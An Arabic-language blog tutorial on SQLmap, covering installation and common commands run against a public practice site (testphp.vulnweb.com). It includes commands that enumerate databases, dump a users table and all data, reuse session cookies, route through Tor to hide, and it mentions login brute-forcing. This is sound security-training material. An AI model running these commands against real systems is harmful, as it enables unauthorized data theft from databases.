Blog Wallpaper
A
ALI ALAKABRالثلاثاء، 1 يوليو 2025

SQLmap

هي أداة قوية ومفتوحة المصدر، تُستخدم لاكتشاف واستغلال ثغرات SQL Injection بشكل أوتوماتيكي. وظيفتها الأساسية هي اختبار التطبيقات اللي تتعامل مع قواعد البيانات والتأكد إذا كانت قابلة للاختراق عن طريق حقن أوامر SQL

منذ شهرين تقريبا

Area Iconالأمن السيبراني - إختبار الإختراق1.9.4 النسخة

طريقة تثبيت SQLMap:

على أنظمة لينكس (Kali – Ubuntu – ParrotOS)

git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
sqlmap --help

ملاحظة: لازم تتأكد عندك Python 3 منصب بالجهاز.

على ويندوز:

  1. تنزّل Git for Windows
  2. تفتح الـ Git Bash وتكتب:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py --help

تحتاج تنصّب Python من موقعه الرسمي: https://www.python.org/downloads/

بعدها تكدر تنقلها لـ /usr/share/bin حتى تستعملها بأي مكان داخل النظام.

ماهي فائدة SQLMap؟ وليش أستخدمها؟

  • باحث أمني (Bug Bounty Hunter)
  • تشتغل باختبار الاختراق (Penetration Tester)
  • مطوّر وتريد تختبر نظامك
  • أو حتى طالب تتعلم أمن المعلومات
  • MySQL
  • PostgreSQL
  • MSSQL
  • Oracle
  • SQLite
  • MariaDB
    وغيرها هواي...

أشهر أوامر SQLMap :

1. فحص بسيط للرابط

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --batch
  • -u: تحديد الرابط
  • --batch: يتجاوز الأسئلة ويختار الإعدادات الافتراضية
التنفيذ
التنفيذ

2. تحديد نوع الـ DBMS (اختياري)

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbms=mysql

3. استخراج أسماء قواعد البيانات

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

4. اختيار قاعدة بيانات واستعراض جداولها

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D testdb --tables

5. استخراج بيانات من جدول معيّن

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D testdb -T users --dump

6. استخدام ملف كوكيز

إذا الموقع يحتاج تسجيل دخول، تكدر تستخدم الكوكيز الخاصة بيك:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie="PHPSESSID=abcd1234"

7. استخراج كلشي دفعة وحدة

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all

هذا الأمر يسحب كل قواعد البيانات ويعرضها!

خواص متقدمة بـ SQLMap:

  • يدعم POST و GET
  • يكتشف تلقائي نوع قاعدة البيانات
  • يتعامل ويا الجدران النارية WAF مثل Cloudflare
  • يدعم استخدام Tor للتخفي:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --tor --check-tor
  • يدعم الـ Proxy للتجسس على الاتصال:
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --proxy="http://127.0.0.1:8080"
  • يفيدك همين بالتخمين إذا تشتغل على صفحة تسجيل دخول (login brute-forcing).

📎 روابط مفيدة